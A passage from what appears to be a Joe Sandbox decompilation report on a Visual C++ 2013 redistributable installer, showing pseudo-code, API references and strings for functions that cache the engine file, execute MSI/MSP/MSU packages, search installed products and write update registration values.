												_t26 = _t84 + 0x2c; // 0x75bda79c
												_t82 = E012B5783(_t75, _v24, _t26, 4);
												if(_t82 < 0) {
													goto L18;
												} else {
													_t84 =  *(_t84 + 0x20);
													_push(0);
													if(SetFilePointerEx(_v24, _t84, 0, 0) != 0) {
														_t82 = E012B5783(_t75, _v24,  &_v20, 0xc);
														if(_t82 < 0) {
															_push("Failed to zero out original data offset.");
															goto L35;
														}
													} else {
														_t59 = GetLastError();
														if(_t59 > 0) {
															_t59 = _t59 & 0x0000ffff | 0x80070000;
														}
														_t82 = _t59;
														if(_t82 >= 0) {
															_t82 = 0x80004005;
														}
														E012B294E(_t59, "cache.cpp", 0x5fd, _t82);
														_push("Failed to seek to original data in exe burn section header.");
														goto L35;
													}
												}
											}
										} else {
											_t62 = GetLastError();
											if(_t62 > 0) {
												_t62 = _t62 & 0x0000ffff | 0x80070000;
											}
											_t82 = _t62;
											if(_t82 >= 0) {
												_t82 = 0x80004005;
											}
											E012B294E(_t62, "cache.cpp", 0x5f0, _t82);
											_push("Failed to seek to signature table in exe header.");
											goto L35;
										}
									} else {
										L18:
										_push("Failed to update signature offset.");
										goto L35;
									}
								} else {
									_t65 = GetLastError();
									if(_t65 > 0) {
										_t65 = _t65 & 0x0000ffff | 0x80070000;
									}
									_t82 = _t65;
									if(_t82 >= 0) {
										_t82 = 0x80004005;
									}
									E012B294E(_t65, "cache.cpp", 0x5e6, _t82);
									_push("Failed to seek to checksum in exe header.");
									L35:
									_push(_t82);
									E012AFA86();
								}
							}
						} else {
							_push(_v28);
							E012AFA86(_t82, "Failed to copy engine from: %ls to: %ls", _v32);
						}
					} else {
						E012AFA86(_t82, "Failed to seek to beginning of engine file: %ls", _v32);
					}
					CloseHandle(_v24);
				} else {
					_t70 = GetLastError();
					if(_t70 > 0) {
						_t70 = _t70 & 0x0000ffff | 0x80070000;
					}
					_t82 = _t70;
					if(_t70 >= 0) {
						_t82 = 0x80004005;
					}
					E012B294E(_t70, "cache.cpp", 0x5d6, _t82);
					E012AFA86(_t82, "Failed to create engine file at path: %ls", _v28);
				}
				return E012A7EAA(_t82, 0, _v8 ^ _t85, _t80, _t82, _t84);
			}

0x01297aae
0x01297aae
0x01297ab4
0x01297abb
0x01297ac4
0x01297ad2
0x01297adc
0x01297ae0
0x01297ae7
0x01297aea
0x01297aec
0x01297aed
0x01297af3
0x01297af9
0x01297b47
0x01297b4c
0x01297b50
0x01297b78
0x01297b7c
0x01297b9a
0x01297ba3
0x01297bb2
0x01297bef
0x01297bff
0x01297c0e
0x01297c1d
0x01297c5a
0x01297c66
0x01297c6a
0x00000000
0x01297c6c
0x01297c6e
0x01297c7a
0x01297c7e
0x00000000
0x01297c80
0x01297c80
0x01297c83
0x01297c92
0x01297cd8
0x01297cdc
0x01297cde
0x00000000
0x01297cde
0x01297c94
0x01297c94
0x01297c9c
0x01297ca3
0x01297ca3
0x01297ca8
0x01297cac
0x01297cae
0x01297cae
0x01297cbe
0x01297cc3
0x00000000
0x01297cc3
0x01297c92
0x01297c7e
0x01297c1f
0x01297c1f
0x01297c27
0x01297c2e
0x01297c2e
0x01297c33
0x01297c37
0x01297c39
0x01297c39
0x01297c49
0x01297c4e
0x00000000
0x01297c4e
0x01297c01
0x01297c01
0x01297c01
0x00000000
0x01297c01
0x01297bb4
0x01297bb4
0x01297bbc
0x01297bc3
0x01297bc3
0x01297bc8
0x01297bcc
0x01297bce
0x01297bce
0x01297bde
0x01297be3
0x01297ce3
0x01297ce3
0x01297ce4
0x01297cea
0x01297bb2
0x01297b7e
0x01297b7e
0x01297b8a
0x01297b8f
0x01297b52
0x01297b5b
0x01297b60
0x01297cee
0x01297afb
0x01297afb
0x01297b03
0x01297b0a
0x01297b0a
0x01297b0f
0x01297b13
0x01297b15
0x01297b15
0x01297b25
0x01297b33
0x01297b38
0x01297d04

APIs

CreateFileW.KERNEL32(0128130D,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,0128130D,0128179D,?,01281355,?,00000000), ref: 01297AED
GetLastError.KERNEL32(?,0128130D,?,?,0128180F,?,?,?,01281E12,?), ref: 01297AFB

Part of subcall function 012B57EB: ReadFile.KERNEL32(?,?,?,?,00000000,00000000,75BDA770,00000000,?,01297B78,?,?,?,00000000,00000000,?), ref: 012B5887

SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 01297BAA
GetLastError.KERNEL32(?,0128130D,?,?,0128180F,?,?,?,01281E12,?), ref: 01297BB4
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,0128130D,?,?,0128180F), ref: 01297CEE

Strings

Failed to update signature offset., xrefs: 01297C01
Failed to zero out original data offset., xrefs: 01297CDE
Failed to seek to beginning of engine file: %ls, xrefs: 01297B55
cache.cpp, xrefs: 01297B20, 01297BD9, 01297C44, 01297CB9
Failed to seek to checksum in exe header., xrefs: 01297BE3
Failed to create engine file at path: %ls, xrefs: 01297B2D
Failed to seek to signature table in exe header., xrefs: 01297C4E
Failed to seek to original data in exe burn section header., xrefs: 01297CC3
Failed to copy engine from: %ls to: %ls, xrefs: 01297B84

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cache.cpp
API String ID: 3456208997-3092846023
Opcode ID: eeac1c7688da959f8558483b7e7501692c287ed39cdcb0346f691e85b8d87d6e
Instruction ID: d81dc3fd36b603ba6c545a39e8a1f362af26fdae1eb0b4bcf42dd6f843c187d3
Opcode Fuzzy Hash: eeac1c7688da959f8558483b7e7501692c287ed39cdcb0346f691e85b8d87d6e
Instruction Fuzzy Hash: F051C272A3020BBFEF116A68DDC5EBF7ABAEB44754F140528F301E7150E6759D018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 012A3297 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 210
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E012A3297(intOrPtr* __eax, void* __edx, void* __esi, int _a4, void* _a8, int _a12, intOrPtr* _a16, int _a20, intOrPtr _a24, intOrPtr* _a28) {
				long _v8;
				HANDLE* _v12;
				char _v16;
				HANDLE* _v20;
				void* _v24;
				void* _v28;
				signed int _t70;
				intOrPtr* _t76;

				_t76 = __eax;
				asm("stosd");
				_v8 = 0;
				asm("stosd");
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				while(1) {
					L1:
					_t70 =  *_t76 - 1;
					if(_t70 > 0xd) {
						break;
					}
					switch( *((intOrPtr*)(_t70 * 4 +  &M012A351F))) {
						case 0:
							_t80 = _a16;
							goto L32;
						case 1:
							__eax =  *(__ebx + 8);
							__edi = _a8;
							_v28 =  *(__ebx + 8);
							 &_v28 = 0;
							__eflags = __edi - __ecx;
							__eax = 0 | __eflags != 0x00000000;
							_v24 = __edi;
							__eax = (__eflags != 0) + 1;
							__eax = WaitForMultipleObjects((__eflags != 0) + 1,  &_v28, __ecx, 0xffffffff);
							__eflags = __eax;
							if(__eax == 0) {
								goto L33;
							}
							__eflags = __eax - 1;
							if(__eax != 1) {
								__eax = GetLastError();
								__eflags = __eax;
								if(__eax > 0) {
									__eax = __eax & 0x0000ffff;
									__eax = __eax | 0x80070000;
									__eflags = __eax;
								}
								_v8 = __eax;
								__eflags = __eax;
								if(__eax >= 0) {
									_v8 = 0x80004005;
								}
								__eax = E012B294E(__eax, "apply.cpp", 0x62a, _v8);
								_push("Failed to wait for cache check-point.");
							} else {
								__eax =  &_v8;
								__eax = GetExitCodeThread(__edi,  &_v8);
								__eflags = __eax;
								if(__eax != 0) {
									__eflags = _v8;
									if(_v8 >= 0) {
										_v8 = 0x8000ffff;
									}
									_push("Cache thread exited unexpectedly.");
								} else {
									__eax = GetLastError();
									__eflags = __eax;
									if(__eax > 0) {
										__eax = __eax & 0x0000ffff;
										__eax = __eax | 0x80070000;
										__eflags = __eax;
									}
									_v8 = __eax;
									__eflags = __eax;
									if(__eax >= 0) {
										_v8 = 0x80004005;
									}
									__eax = E012B294E(__eax, "apply.cpp", 0x61f, _v8);
									_push("Failed to get cache thread exit code.");
								}
							}
							_push(_v8);
							goto L40;
						case 2:
							goto L38;
						case 3:
							 &_v16 =  &_v12;
							__ecx = _a4;
							__eax = __esi;
							__eax = E012A258A(__esi, __ecx, __ebx, __ecx,  &_v12, _a24,  &_v16);
							_v8 = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute EXE package.");
							goto L39;
						case 4:
							 &_v16 =  &_v12;
							__ecx = _a4;
							__eax = __esi;
							__eax = E012A278D(__esi, __ebx, __ecx, __edx, __ecx,  &_v12, _a24,  &_v16);
							_v8 = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute MSI package.");
							goto L39;
						case 5:
							 &_v16 =  &_v12;
							__ecx = _a4;
							__eax = __esi;
							__eax = E012A28EB(__esi, __ebx, __ecx, __ecx,  &_v12, _a24,  &_v16);
							_v8 = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute MSP package.");
							goto L39;
						case 6:
							 &_v16 =  &_v12;
							__eax = __esi;
							__ecx = _a4;
							__eax = E012A2AAC(__esi, _a4, __ebx, _a4, _v20,  &_v12, _a24,  &_v16);
							__ecx = _v12;
							_v8 = __eax;
							_v20 = __ecx;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute MSU package.");
							goto L39;
						case 7:
							__eax = __ebx;
							__eax = E012A1549(__ebx, __edx, _a4);
							_v8 = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute package provider registration action.");
							goto L39;
						case 8:
							__eax = __ebx;
							__eax = E012A1591(__ebx, __edx, _a4);
							_v8 = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								goto L33;
							}
							_push("Failed to execute dependency action.");
							L39:
							_push(0x8000ffff);
							goto L40;
						case 9:
							__ecx = _a12;
							goto L32;
						case 0xa:
							__ecx = _a20;
							L32:
							 *_t80 =  *((intOrPtr*)(_t76 + 8));
							goto L33;
						case 0xb:
							__eax =  *(__ebx + 8);
							__edi = 0;
							__eflags =  *((intOrPtr*)( *(__ebx + 8) + 0x14)) - __ecx;
							if(__eflags != 0) {
								_t52 = _a4 + 0x4a4; // 0x10c28341
								__edi = E01290286(__ecx, __edx, __eflags,  *_t52, __ebx);
								__eflags = __edi;
								if(__edi < 0) {
									_push("Failed to load compatible package on per-machine package.");
									_push(__edi);
									__eax = E012AFA86();
									_pop(__ecx);
									_pop(__ecx);
								}
							}
							_v8 = __edi;
							__eflags = __edi;
							if(__edi >= 0) {
								L33:
								_t75 = _a28;
								_t81 = _v16;
								if( *_t75 < _t81) {
									 *_t75 = _t81;
								}
								if(_v12 != 0) {
									if( *_t75 < 2) {
										goto L1;
									}
								}
								goto L41;
							} else {
								_push("Failed to execute compatible package action.");
								_push(__edi);
								L40:
								E012AFA86();
								L41:
								return _v8;
							}
					}
				}
				L38:
				_v8 = 0x8000ffff;
				_push("Invalid execute action.");
				goto L39;
			}

0x012a32a1
0x012a32a8
0x012a32a9
0x012a32ac
0x012a32ad
0x012a32b0
0x012a32b3
0x012a32b6
0x012a32b9
0x012a32b9
0x012a32bb
0x012a32bf
0x00000000
0x00000000
0x012a32c5
0x00000000
0x012a32cc
0x00000000
0x00000000
0x012a32d4
0x012a32d7
0x012a32da
0x012a32e4
0x012a32e6
0x012a32e8
0x012a32eb
0x012a32ee
0x012a32f0
0x012a32f6
0x012a32f8
0x00000000
0x00000000
0x012a32fe
0x012a3301
0x012a34e0
0x012a34e6
0x012a34e8
0x012a34ea
0x012a34ef
0x012a34ef
0x012a34ef
0x012a34f4
0x012a34f7
0x012a34f9
0x012a34fb
0x012a34fb
0x012a350f
0x012a3514
0x012a3307
0x012a3307
0x012a330c
0x012a3312
0x012a3314
0x012a34c9
0x012a34cd
0x012a34cf
0x012a34cf
0x012a34d6
0x012a331a
0x012a331a
0x012a3320
0x012a3322
0x012a3324
0x012a3329
0x012a3329
0x012a3329
0x012a332e
0x012a3331
0x012a3333
0x012a3335
0x012a3335
0x012a3349
0x012a334e
0x012a334e
0x012a3314
0x012a3353
0x00000000
0x00000000
0x00000000
0x00000000
0x012a3362
0x012a3367
0x012a336b
0x012a336d
0x012a3372
0x012a3375
0x012a3377
0x00000000
0x00000000
0x012a337d
0x00000000
0x00000000
0x012a338e
0x012a3393
0x012a3396
0x012a3398
0x012a339d
0x012a33a0
0x012a33a2
0x00000000
0x00000000
0x012a33a8
0x00000000
0x00000000
0x012a33b9
0x012a33be
0x012a33c1
0x012a33c3
0x012a33c8
0x012a33cb
0x012a33cd
0x00000000
0x00000000
0x012a33d3
0x00000000
0x00000000
0x012a33e4
0x012a33eb
0x012a33ee
0x012a33f2
0x012a33f7
0x012a33fa
0x012a33fd
0x012a3400
0x012a3402
0x00000000
0x00000000
0x012a3408
0x00000000
0x00000000
0x012a3415
0x012a3417
0x012a341c
0x012a341f
0x012a3421
0x00000000
0x00000000
0x012a3423
0x00000000
0x00000000
0x012a3430
0x012a3432
0x012a3437
0x012a343a
0x012a343c
0x00000000
0x00000000
0x012a343e
0x012a34b8
0x012a34b8
0x00000000
0x00000000
0x012a3485
0x00000000
0x00000000
0x012a3480
0x012a3488
0x012a348b
0x00000000
0x00000000
0x012a3445
0x012a3448
0x012a344a
0x012a344d
0x012a3453
0x012a345e
0x012a3460
0x012a3462
0x012a3464
0x012a3469
0x012a346a
0x012a346f
0x012a3470
0x012a3470
0x012a3462
0x012a3471
0x012a3474
0x012a3476
0x012a348d
0x012a348d
0x012a3490
0x012a3495
0x012a3497
0x012a3497
0x012a349e
0x012a34a3
0x00000000
0x00000000
0x012a34a9
0x00000000
0x012a3478
0x012a3478
0x012a347d
0x012a34b9
0x012a34b9
0x012a34c0
0x012a34c6
0x012a34c6
0x00000000
0x012a32c5
0x012a34ab
0x012a34b0
0x012a34b3
0x00000000

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,?,?,?,?,012A37C3,00000001,00000000,000000B9,00000000,?), ref: 012A32F0
GetExitCodeThread.KERNEL32(?,00000001,?,?,?,?,012A37C3,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000), ref: 012A330C
GetLastError.KERNEL32(?,?,?,?,012A37C3,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000,00000001,00000000), ref: 012A331A
GetLastError.KERNEL32(?,?,?,?,012A37C3,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000,00000001,00000000), ref: 012A34E0

Strings

Failed to get cache thread exit code., xrefs: 012A334E
apply.cpp, xrefs: 012A3344, 012A350A
Failed to execute MSU package., xrefs: 012A3408
Failed to execute MSI package., xrefs: 012A33A8
Invalid execute action., xrefs: 012A34B3
Cache thread exited unexpectedly., xrefs: 012A34D6
Failed to execute package provider registration action., xrefs: 012A3423
Failed to load compatible package on per-machine package., xrefs: 012A3464
Failed to execute EXE package., xrefs: 012A337D
Failed to execute MSP package., xrefs: 012A33D3
Failed to execute compatible package action., xrefs: 012A3478
Failed to execute dependency action., xrefs: 012A343E
Failed to wait for cache check-point., xrefs: 012A3514

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 9ac3639279517711f66760513338f81e243dd1223c1f1f5ceeb5920d7edd26b6
Instruction ID: 8d732af7891a56493c1cb60ca3b95fc692f10705bb5fe666987161189f199a34
Opcode Fuzzy Hash: 9ac3639279517711f66760513338f81e243dd1223c1f1f5ceeb5920d7edd26b6
Instruction Fuzzy Hash: 69716B79A6020AFFDB06DFA5D8419BE7BB9FF04710B90816DFA05E7200E774DA009B50

Uniqueness

Uniqueness Score: -1.00%

Function 01288011 Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01288011(intOrPtr* __ebx, intOrPtr _a4) {
				char _v8;
				char* _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t63;
				void* _t75;
				void* _t76;
				void* _t80;
				void* _t81;
				intOrPtr* _t96;
				signed int _t101;
				void* _t105;
				void* _t106;
				void* _t107;

				_t96 = __ebx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t58 =  *((intOrPtr*)(__ebx + 0x10));
				_t98 = _t58 - 1;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_t98 == 0) {
					_v12 = L"VersionString";
					L9:
					_t59 =  *((intOrPtr*)(_t96 + 0x18));
					_push(0);
					if(_t59 == 0) {
						_push( &_v8);
						_push( *((intOrPtr*)(_t96 + 0x14)));
						_push(_a4);
						_t105 = E01288C14();
						if(_t105 >= 0) {
							L17:
							_v28 = 2;
							if(_v8 == 0) {
								L21:
								if(_t105 != 0x80070645) {
									L28:
									if(_t105 >= 0) {
										_t63 =  *((intOrPtr*)(_t96 + 0x10)) - 1;
										if(_t63 == 0) {
											_v20 = 3;
										} else {
											_t75 = _t63 - 1;
											if(_t75 == 0) {
												_v20 = 2;
											} else {
												_t76 = _t75 - 1;
												if(_t76 == 0 || _t76 == 1) {
													_v20 = 1;
												}
											}
										}
										_t106 = E012A10FF( &_v36, _v20);
										if(_t106 >= 0) {
											_t106 = E0128A7B0(_a4,  *((intOrPtr*)(_t96 + 4)),  &_v36, 0);
											if(_t106 >= 0) {
												goto L46;
											}
											_push("Failed to set variable.");
											goto L44;
										} else {
											_push("Failed to change value type.");
											L44:
											_push(_t106);
											E012AFA86();
											L45:
											_push(_t106);
											E012AF6A2(2, "MsiProductSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t96);
											L46:
											if(_v8 != 0) {
												E012B01E8(_v8);
											}
											if(_v16 != 0) {
												E012B01E8(_v16);
											}
											E012A0E72( &_v36);
											return _t106;
										}
									}
									_push("Failed to get product info.");
									goto L44;
								}
								E012AF6A2(2, "Product not found: %ls", _v8);
								_t107 = _t107 + 0xc;
								_t80 =  *((intOrPtr*)(_t96 + 0x10)) - 1;
								if(_t80 == 0) {
									L25:
									_v36 = _v36 & 0x00000000;
									L26:
									_v32 = _v32 & 0x00000000;
									_v28 = 1;
									L27:
									_t105 = 0;
									goto L28;
								}
								_t101 = 2;
								_t81 = _t80 - _t101;
								if(_t81 == 0) {
									_v36 = _t101;
									goto L26;
								}
								if(_t81 != 1) {
									goto L27;
								}
								goto L25;
							}
							_t105 = E012B43D5(_t98, _v8, _v12,  &_v36);
							if(_t105 != 0x80070648) {
								goto L21;
							}
							_push(_v8);
							E012AF6A2(3, "Trying per-machine extended info for property \'%ls\' for product: %ls", _v12);
							_t107 = _t107 + 0x10;
							_t105 = E012B4461(_t98, _v8, 0, 4, _v12,  &_v36);
							if(_t105 != 0x80070645) {
								goto L28;
							}
							_push(_v8);
							E012AF6A2(2, "Trying per-user extended info for property \'%ls\' for product: %ls", _v12);
							_t107 = _t107 + 0x10;
							_t105 = E012B4461(_t98, _v8, 0, 2, _v12,  &_v36);
							goto L21;
						}
						_push("Failed to format product code string.");
						goto L44;
					}
					_t98 =  &_v16;
					_push( &_v16);
					_push(_t59);
					_push(_a4);
					_t106 = E01288C14();
					if(_t106 >= 0) {
						_t105 = E01287EA3( &_v16, 0, _v16,  &_v8);
						if(_t105 == 0x80070103) {
							E012AF6A2(2, "No products found for UpgradeCode: %ls", _v16);
							_t107 = _t107 + 0xc;
							_t105 = 0x80070645;
							goto L17;
						}
						if(_t105 >= 0) {
							goto L17;
						}
						_push(_v16);
						_push("Failed to find product for UpgradeCode: %ls");
						L15:
						_push(_t105);
						E012AFA86();
						_t107 = _t107 + 0xc;
						goto L45;
					}
					_push("Failed to format upgrade code string.");
					goto L44;
				}
				_t98 = _t98 - 1;
				if(_t98 == 0) {
					_v12 = L"Language";
					goto L9;
				}
				_t98 = _t98 - 1;
				if(_t98 == 0) {
					_v12 = L"State";
					goto L9;
				}
				if(_t98 == 0) {
					_v12 = L"AssignmentType";
					goto L9;
				} else {
					_push(_t58);
					_t105 = 0x80004001;
					_push("Unsupported product search type: %u");
					goto L15;
				}
			}

0x01288011
0x0128801e
0x0128801f
0x01288020
0x01288021
0x01288022
0x01288029
0x0128802a
0x0128802d
0x01288030
0x01288033
0x01288066
0x0128806d
0x0128806d
0x01288075
0x01288078
0x012881a5
0x012881a6
0x012881a9
0x012881b1
0x012881b5
0x012880df
0x012880e3
0x012880ea
0x0128815d
0x0128815f
0x01288194
0x01288196
0x012881ca
0x012881cb
0x012881e8
0x012881cd
0x012881cd
0x012881ce
0x012881df
0x012881d0
0x012881d0
0x012881d1
0x012881d6
0x012881d6
0x012881d1
0x012881ce
0x012881fb
0x012881ff
0x01288219
0x0128821d
0x00000000
0x00000000
0x0128821f
0x00000000
0x01288201
0x01288201
0x01288224
0x01288224
0x01288225
0x0128822c
0x0128822c
0x01288236
0x0128823e
0x01288242
0x01288247
0x01288247
0x01288250
0x01288255
0x01288255
0x0128825e
0x01288268
0x01288268
0x012881ff
0x01288198
0x00000000
0x01288198
0x0128816b
0x01288173
0x01288176
0x01288177
0x01288183
0x01288183
0x01288187
0x01288187
0x0128818b
0x01288192
0x01288192
0x00000000
0x01288192
0x0128817b
0x0128817c
0x0128817e
0x012881c2
0x00000000
0x012881c2
0x01288181
0x00000000
0x00000000
0x00000000
0x01288181
0x012880fb
0x01288103
0x00000000
0x00000000
0x01288105
0x01288112
0x01288117
0x0128812d
0x01288131
0x00000000
0x00000000
0x01288133
0x01288140
0x01288145
0x0128815b
0x00000000
0x0128815b
0x012881bb
0x00000000
0x012881bb
0x0128807e
0x01288081
0x01288082
0x01288083
0x0128808b
0x0128808f
0x012880a7
0x012880af
0x012880d5
0x012880da
0x012880dd
0x00000000
0x012880dd
0x012880b3
0x00000000
0x00000000
0x012880b5
0x012880b8
0x012880bd
0x012880bd
0x012880be
0x012880c3
0x00000000
0x012880c3
0x01288091
0x00000000
0x01288091
0x01288035
0x01288036
0x0128805d
0x00000000
0x0128805d
0x01288038
0x01288039
0x01288054
0x00000000
0x01288054
0x0128803c
0x0128804b
0x00000000
0x0128803e
0x0128803e
0x0128803f
0x01288044
0x00000000
0x01288044

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 01288086
_MREFOpen@16.MSPDB140-MSVCRT ref: 012881AC

Strings

VersionString, xrefs: 01288066
Failed to set variable., xrefs: 0128821F
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 0128810B
Failed to find product for UpgradeCode: %ls, xrefs: 012880B8
Failed to get product info., xrefs: 01288198
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 01288139
Failed to change value type., xrefs: 01288201
State, xrefs: 01288054
Unsupported product search type: %u, xrefs: 01288044
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0128822F
Language, xrefs: 0128805D
No products found for UpgradeCode: %ls, xrefs: 012880CE
Product not found: %ls, xrefs: 01288164
Failed to format upgrade code string., xrefs: 01288091
Failed to format product code string., xrefs: 012881BB

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16
String ID: Failed to change value type.$Failed to find product for UpgradeCode: %ls$Failed to format product code string.$Failed to format upgrade code string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$No products found for UpgradeCode: %ls$Product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2367264253
Opcode ID: 10af94afc56fb8c334b8e442e914e3c95999bd739875bedeae61a4b27aefd1e5
Instruction ID: deb12408b07402a9ccc4a6ec3d62f92cc03d7d3cf0e067c17a172de441bc27c6
Opcode Fuzzy Hash: 10af94afc56fb8c334b8e442e914e3c95999bd739875bedeae61a4b27aefd1e5
Instruction Fuzzy Hash: 26611532D7261ABBEF12BB98CC46FFDBA75BF14740F840055EB007A191D7B58A008791

Uniqueness

Uniqueness Score: -1.00%

Function 01286AA5 Relevance: 29.9, APIs: 1, Strings: 16, Instructions: 144
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E01286AA5(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				char* _t52;
				void* _t60;
				void* _t61;
				void* _t64;
				char* _t67;

				_t58 = __edx;
				_t55 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t64 = __eax;
				_t60 = E01285E2D(__ecx, __eax,  &_v12);
				if(_t60 >= 0) {
					_t8 = _t64 + 0x4c; // 0xf08b8007
					_t60 = E012B36CB( *_t8, _v12, 0x20006,  &_v8);
					if(_t60 >= 0) {
						_t52 = L"ThisVersionInstalled";
						_t61 = E012B3B02(_t55, __edx, _v8, _t52, "Y");
						if(_t61 >= 0) {
							_t10 = _t64 + 0x60; // 0x12ba6e4
							_t52 = L"PackageName";
							_t61 = E012B3B02(_t55, __edx, _v8, _t52,  *_t10);
							if(_t61 < 0) {
								goto L6;
							} else {
								_t12 = _t64 + 0x64; // 0x3152ae8
								_t52 = L"PackageVersion";
								_t61 = E012B3B02(_t55, _t58, _v8, _t52,  *_t12);
								if(_t61 < 0) {
									goto L6;
								} else {
									_t14 = _t64 + 0x68; // 0xa6c46800
									_t52 = L"Publisher";
									_t61 = E012B3B02(_t55, _t58, _v8, _t52,  *_t14);
									if(_t61 < 0) {
										goto L6;
									} else {
										_t16 = _t64 + 0xa4; // 0x80070000
										_t43 =  *_t16;
										if( *_t16 == 0) {
											L12:
											_t18 = _t64 + 0xb0; // 0x56800040
											_t67 = L"ReleaseType";
											_t61 = E012B3B02(_t55, _t58, _v8, _t67,  *_t18);
											if(_t61 < 0) {
												L17:
												_push(_t67);
												goto L18;
											} else {
												_t54 = _a4;
												_t67 = L"InstalledBy";
												_t61 = E012861B5(_t55, _t58, _v8, _a4, L"LogonUser", _t67);
												if(_t61 < 0) {
													goto L17;
												} else {
													_t67 = L"InstalledDate";
													_t61 = E012861B5(_t55, _t58, _v8, _t54, L"Date", _t67);
													if(_t61 < 0) {
														goto L17;
													} else {
														_t67 = L"InstallerName";
														_t61 = E012861B5(_t55, _t58, _v8, _t54, _t67, _t67);
														if(_t61 < 0) {
															goto L17;
														} else {
															_t67 = L"InstallerVersion";
															_t61 = E012861B5(_t55, _t58, _v8, _t54, _t67, _t67);
															if(_t61 < 0) {
																goto L17;
															}
														}
													}
												}
											}
										} else {
											_t52 = L"PublishingGroup";
											_t61 = E012B3B02(_t55, _t58, _v8, _t52, _t43);
											if(_t61 < 0) {
												goto L6;
											} else {
												goto L12;
											}
										}
									}
								}
							}
						} else {
							L6:
							_push(_t52);
							L18:
							_push("Failed to write %ls value.");
							_push(_t61);
							E012AFA86();
						}
					} else {
						_push("Failed to create the key for update registration.");
						goto L4;
					}
				} else {
					_push("Failed to get the formatted key path for update registration.");
					L4:
					_push(_t60);
					E012AFA86();
				}
